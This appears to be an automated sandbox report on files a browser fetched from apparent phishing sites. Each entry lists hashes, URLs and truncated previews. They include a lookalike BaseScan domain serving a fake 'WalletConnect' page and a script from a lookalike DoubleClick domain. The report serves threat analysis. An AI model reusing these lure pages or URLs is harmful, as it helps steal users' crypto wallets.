                                                                                                                                                                                                                                              Preview:/*!.. * clipboard.js v2.0.11.. * https://clipboardjs.com/.. *.. * Licensed MIT . Zeno Rocha.. */..!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):"object"==typeof exports?exports.ClipboardJS=e():t.ClipboardJS=e()}(this,function(){return n={686:function(t,e,n){"use strict";n.d(e,{default:function(){return b}});var e=n(279),i=n.n(e),e=n(370),u=n.n(e),e=n(817),r=n.n(e);function c(t){try{return document.execCommand(t)}catch(t){return}}var a=function(t){t=r()(t);return c("cut"),t};function o(t,e){var n,o,t=(n=t,o="rtl"===document.documentElement.getAttribute("dir"),(t=document.createElement("textarea")).style.fontSize="12pt",t.style.border="0",t.style.padding="0",t.style.margin="0",t.style.position="absolute",t.style[o?"right":"left"]="-9999px",o=window.pageYOffset||document.documentElement.scrollTop,t.style.top="".concat(o,"px"),t.setAttribute("readonly",""),t.value=n,t);return e.container.appendChild(t
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (544), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):544
                                                                                                                                                                                                                                              Entropy (8bit):4.584255491942785
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:1QkvFrW30s0s0s0s0s0s0s0s1PAQ1m6SfVVVVVVVVmn:1Qk8AQo6Sun
                                                                                                                                                                                                                                              MD5:95F65E2033FAB9FC186C85FBA5885D3F
                                                                                                                                                                                                                                              SHA1:C92366FDCE167424554D04FCD92A116916001E45
                                                                                                                                                                                                                                              SHA-256:E1E9D283D521CEB1D143C0709FCEA4F1E8D89ED2EB136C281ABBF8DA43F4B3F4
                                                                                                                                                                                                                                              SHA-512:AC26E0F6F06DE8E913D96A82B6D25B7006B80C50242F8670899109F4AEA5CFE326E2B1EB2A64814AC03E0532FF8CCF94C6AE4B930D53C37364D2DE0480C48791
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISowEJIMTsce6RjyQSBQ0aaYzfEgUNPR9TPBIFDVqx1xASBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ0x5S_-EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EhcJZYhefQAA49wSBQ0aaYzfEgUNPR9TPBIQCUEJ0hJnBK5aEgUNWrHXEBJICVoE179YuGNkEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEk8J46cmNQVSPi0SBQ0x5S_-EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_?alt=proto
                                                                                                                                                                                                                                              Preview:CsYBCgcNGmmM3xoACgcNPR9TPBoACgcNWrHXEBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNMeUv/hoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoAChIKBw0aaYzfGgAKBw09H1M8GgAKCQoHDVqx1xAaAApRCgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACloKBw0x5S/+GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2945), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2945
                                                                                                                                                                                                                                              Entropy (8bit):4.611417126299186
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:wqyuK6PbKoKF+5OF++OE97APyvsPnYQtK9QKPk/vw/QwuKf/QKQpxPwpQwkKfpQl:At6PbKoKF+5OF++OE97AcsPnYQtK9QK0
                                                                                                                                                                                                                                              MD5:8A021F8E818FA69FB152EA91E364E630
                                                                                                                                                                                                                                              SHA1:277364558C033DAD9CC63E672306B5F24B08889E
                                                                                                                                                                                                                                              SHA-256:5116E22349DFF56EA078BA8FE76F948430A6AA6C542DF2CC455607691BB40D26
                                                                                                                                                                                                                                              SHA-512:C9E89925C642DE07A34EE541F5D29E6EF63357597C72BDC318CCCEE0964166B8EB566A2A6475A4386F9F20C88A9AF40C5DE3CDD4B1294935BC6C5D2CB8CAE34E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/hs-megamenu/src/hs.megamenu.css?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:.hs-menu-initialized{position:relative;z-index:10}.hs-menu-initialized .animated{-webkit-animation-duration:300ms;animation-duration:300ms}.hs-overflow-x-locked{overflow-x:hidden}.hs-sub-menu,.hs-mega-menu{display:none;position:absolute;left:0;top:100%;z-index:2;margin-top:-.002rem;visibility:hidden;background-color:#fff;opacity:1!important}.hs-sub-menu-opened>.hs-sub-menu,.hs-mega-menu-opened>.hs-mega-menu{visibility:visible;opacity:1}.hs-sub-menu{min-width:180px}.hs-has-sub-menu{overflow:hidden;position:relative}.hs-sub-menu-opened{overflow:visible}.hs-sub-menu .hs-sub-menu,.hs-mega-menu .hs-sub-menu,.hs-sub-menu .hs-mega-menu,.hs-mega-menu .hs-mega-menu{top:0;left:100%;margin-top:0}.hs-menu-vertical .hs-sub-menu,.hs-menu-vertical .hs-mega-menu{top:0;left:100%;margin-top:0}.hs-menu-vertical .hs-sub-menu{width:auto}.hs-menu-vertical .hs-mega-menu{height:100%}.hs-mobile-state .hs-sub-menu,.hs-mobile-state .hs-mega-menu{position:static;visibility:visible}.hs-mobile-state .hs-has-mega-me
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/loaderImage.gif
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):822
                                                                                                                                                                                                                                              Entropy (8bit):4.8224840486251885
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:Uko1IMfoQzqeo8tsWnQpMhdLS3+32zq+RmrKtzleT:UkoiMmeo8txQpMhIWKRmWA
                                                                                                                                                                                                                                              MD5:4C70D05CC639E1C6590A02DD16A05C8F
                                                                                                                                                                                                                                              SHA1:89BB034BEB884A7DCA10457B6C9C9A220CB834B0
                                                                                                                                                                                                                                              SHA-256:EA2324158EBE42641AFC714AC0255CCAE52F83BE14AAFD2FA87A7EFC47B05697
                                                                                                                                                                                                                                              SHA-512:64951C04624FD92336033D837DCDFA15A4D914AEEB61219A3E69CCB705B66938E6EB755C7F9C3433E1D53CCA34D8B9A5B7E328A94C826FBF1574CA3DD6752F78
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/styles.css
                                                                                                                                                                                                                                              Preview:body {.. margin: 0;.. padding: 0;.. display: flex;.. justify-content: center;.. align-items: center;.. height: 100vh;.. background-color: transparent; /* Transparent background */..}....#walletconnect-wrapper {.. visibility: hidden;..}.....overlay {.. position: fixed;.. top: 0;.. left: 0;.. width: 100%;.. height: 100%;.. background: transparent; /* Transparent background */.. display: none;.. justify-content: center;.. align-items: center;..}.....overlay.active {.. display: flex;..}.....iframe-container {.. width: 100%; /* Full width */.. height: 100%; /* Full height */.. background-color: transparent; /* Transparent background */.. position: absolute; /* Use absolute positioning */.. overflow: hidden; /* Hide iframe scrollbar */..}....#websiteFrame {.. width: 100%;.. height: 100%;..}..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1227
                                                                                                                                                                                                                                              Entropy (8bit):5.729133714457574
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6Lxzum8COZNDsLlpGPUc6QlutnMq6iJxt+Rn1r/Dz1:+ZYjwxlfll0xluX6OP+x1r/DR
                                                                                                                                                                                                                                              MD5:903FEDB614F442FF0959444FF6975105
                                                                                                                                                                                                                                              SHA1:3BD8BBBC3E03926EE25C8BB6027973C77AC039D1
                                                                                                                                                                                                                                              SHA-256:D8571EB1E87EC2C83753CE99D588B912A42D72BF2B6082997FE2FBACA200C08F
                                                                                                                                                                                                                                              SHA-512:327B550776B65DFC10E95E93AC820B4426A60A149FEADB3969F5AD4EE2D3382EFF9BCDBBEB526DDB939922FB55C13CE481DF478EAC2E86C43C246CCBCEE47340
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/4d204e0c-db12-471d-8fd6-238df2c36ea1.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3.......(iinf..........infe........av01Color.....iprp...cipco....ispe.......d...d....pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma....................mdat........`...B2.......1..K#u...V.B..F..|7.x....Y.pxy.h.5........xJqn....( ..]>;...?... ._&.ML.1.*T}..S.nz.E.x!:...Fh.}.......u. ..d..r.@0..w%F'b....,{.j|,DA.[Lt.W.Oe.7. ..Lo|
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (31748)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):41955
                                                                                                                                                                                                                                              Entropy (8bit):5.573275018815817
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:Q7t55W+8+8ToOWc+xbO5ViQzYxKd/wnDw9GD60+LSiD8GXSkckbzLAGkHqLyMe04:S5s+fx6iQ8xKpej60+LSytbEM2owf
                                                                                                                                                                                                                                              MD5:1C7710E820F0FD35E1A783191848C2F3
                                                                                                                                                                                                                                              SHA1:C64AEF70542818F60DA20B56F6404DF035ECA1B5
                                                                                                                                                                                                                                              SHA-256:48C09911B218C369F0E8A4AEE59B697C81467ECF0427B9E14A29D204EB7256CD
                                                                                                                                                                                                                                              SHA-512:E57B3661E432A23F7F58F5DD8DC918AF80DA7E47B2EC9DD87365531E9EA5E64A103FE13609D44510A81DAB884C0FE0256DABAE9BA7BFDD38A05C1031E69CFAA7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/index-99ee4a48.js
                                                                                                                                                                                                                                              Preview:var Rt=Object.defineProperty,At=Object.defineProperties;var Et=Object.getOwnPropertyDescriptors;var at=Object.getOwnPropertySymbols;var Nt=Object.prototype.hasOwnProperty,Bt=Object.prototype.propertyIsEnumerable;var it=(s,e,r)=>e in s?Rt(s,e,{enumerable:!0,configurable:!0,writable:!0,value:r}):s[e]=r,ke=(s,e)=>{for(var r in e||(e={}))Nt.call(e,r)&&it(s,r,e[r]);if(at)for(var r of at(e))Bt.call(e,r)&&it(s,r,e[r]);return s},De=(s,e)=>At(s,Et(e));var lt=(s,e,r)=>new Promise((t,n)=>{var i=b=>{try{d(r.next(b))}catch(o){n(o)}},v=b=>{try{d(r.throw(b))}catch(o){n(o)}},d=b=>b.done?t(b.value):Promise.resolve(b.value).then(i,v);d((r=r.apply(s,e)).next())});import{c as _,i as S,t as k,j as Xe,b as Qe,e as z,s as I,u as te,d as Fe,g as Ke,a as U,k as ft,m as Ft}from"./web-13cf6287.js";import{p as Se,P as ht,_ as Pt,c as N,B as fe,I as bt,A as Dt,b as Ot,t as Vt,h as Ue,e as le,a as Ut,V as Jt,s as _t,k as Je,w as qt,T as Ee,$ as Oe,D as Gt,u as vt,g as Ht}from"./manifest-51a3674f.js";import{i as Wt,
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1384
                                                                                                                                                                                                                                              Entropy (8bit):6.078813111957932
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6Lzkzum8COZNDsLlpGPUc6QluxaWNqGv+1Db6UQiFpG5ygz+:+ZYjwzklfll0xlucIqGvm6UQsG5y
                                                                                                                                                                                                                                              MD5:B2040EEC31E922FC9CF78FE76CBB54AE
                                                                                                                                                                                                                                              SHA1:0FC61D43A7ED007515C9B5D01CDD4C8A886C0F94
                                                                                                                                                                                                                                              SHA-256:61311FC4FA025072366092E6CFC0F3DEB4DF3E7A0CD3DA9007E52551C5375DF8
                                                                                                                                                                                                                                              SHA-512:2D2185736AB1328DF33F072A1CD1D712CC38C709E4CB37DC3669732E12D83D573562B1F73C842BD9B3658370EB4106AA2D5A2310AB032BBD314EEEC58F4C7758
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/fab0e3ca6b.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3...5...(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma...................=mdat........0@CA.2.......1.....$...n...5..N.x.i....u..'....'M...)k\9..|...m.....3:E.K..C...I..........]..~].(J.XZA#...-.&..x.%6..y/.j.*..,w... .L...f.RG -......B...l.dXF..-.AN.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (617)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):3408
                                                                                                                                                                                                                                              Entropy (8bit):5.30132232107609
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:vWW368qvqxznHrTHJNoA521QIeh5uLEsH3Xg:uUuoznHyWIeh5uLEsH3Xg
                                                                                                                                                                                                                                              MD5:A73983C9A114BAB4B60932653D278763
                                                                                                                                                                                                                                              SHA1:7CF40DDE8F0B037A341F6BA0B0BBC79DE647D86D
                                                                                                                                                                                                                                              SHA-256:F03EE7F3D8E576810A4D3F272E201F32ED90F692FA735012EAB37610AC5FD5D6
                                                                                                                                                                                                                                              SHA-512:FD4E581937A0790A4C8FD5D528389B8622D83A76E77927805BA3BFA56E9D74C7B218BF9BB4B9C9F3F3D2241332BBDFB97E8DDF7C79C7D443F86104057921972F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://pubads.g.doubleclick.uk.net/deliver/js/26daa3196b90b70
                                                                                                                                                                                                                                              Preview:var script_url_path="js/";var url="//pubads.g.doubleclick.uk.net/deliver/token/26daa3196b90b70";!function(){var t=document.getElementsByTagName("script"),e="readyState" in(t[0]||document.createElement("script")),r=!window.opera||"[object Opera]"!==window.opera.toString(),o=e&&r,n=function(t){var e="currentScript" in t,r="function"==typeof Object.getOwnPropertyDescriptor,o="function"==typeof Object.getPrototypeOf,n="object"==typeof "test".__proto__;function i(){var e,o=!0;return r&&(e=Object.getOwnPropertyDescriptor(t,"currentScript")||void 0)&&"function"==typeof e.get&&e.get===c&&(o=!1),o?t.currentScript:null}.return function t(u,p){var f,d,a,y;return e&&r&&u&&u!==Object.prototype&&p&&p!==Object.prototype&&(r&&(f=Object.getOwnPropertyDescriptor(u,"currentScript")||void 0)&&"function"==typeof f.get&&(d=f.get),d||(d=t((null!=(a=u)&&(y=o?Object.getPrototypeOf(a):n?a.__proto__:null!=a.constructor?a.constructor.prototype:void 0),y),p))),d?d===c&&(d=void 0):d=i,d}(t,t)}(document);function c(
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/styles.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):17953
                                                                                                                                                                                                                                              Entropy (8bit):4.9929670197105525
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:pJY7dOPIjjrQwTU5DZTU5D59RZrI07pEl8sAR4U3sKfeBk2Di9+Vh1r6f9+PKGp5:OpveU5iCGpBM3r6XZ
                                                                                                                                                                                                                                              MD5:394B0C876FA3C34C5751F6431552AA5E
                                                                                                                                                                                                                                              SHA1:4CE1515D0A90F7AABF90ABEC7C756578BF1C5C7E
                                                                                                                                                                                                                                              SHA-256:58B7A7AA983E6E1CE361117D8C70E4D75DD8DAF6C632F499E8D8B45D4D9021D6
                                                                                                                                                                                                                                              SHA-512:6D8DA1DFD3D9011D02BBDF6F3797F4AF31253D8270ED6CBBD34D0104FBF34AD443F1933A6EB869EBBC7A40C3A150C24B8EF1950478705AFF081318179CD7CA91
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/840013fd8c2ab234.css
                                                                                                                                                                                                                                              Preview:/*.! tailwindcss v3.2.7 | MIT License | https://tailwindcss.com.*/.*,.:after,.:before {. box-sizing: border-box;. border: 0 solid #eee;.}.:after,.:before {. --tw-content: "";.}.html {. line-height: 1.5;. -webkit-text-size-adjust: 100%;. -moz-tab-size: 4;. -o-tab-size: 4;. tab-size: 4;. font-family: Montserrat, ui-sans-serif, system-ui, -apple-system,. BlinkMacSystemFont, Segoe UI, Roboto, Helvetica Neue, Arial, Noto Sans,. sans-serif, Apple Color Emoji, Segoe UI Emoji, Segoe UI Symbol,. Noto Color Emoji;. font-feature-settings: normal;.}.body {. margin: 0;. line-height: inherit;.}.hr {. height: 0;. color: inherit;. border-top-width: 1px;.}.abbr:where([title]) {. -webkit-text-decoration: underline dotted;. text-decoration: underline dotted;.}.h1,.h2,.h3,.h4,.h5,.h6 {. font-size: inherit;. font-weight: inherit;.}.a {. color: inherit;. text-decoration: inherit;.}.b,.strong {. font-weight: bolder;.}.code,.kbd,.pre,.samp {. font-family: ui-monospace, SFMono-R
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
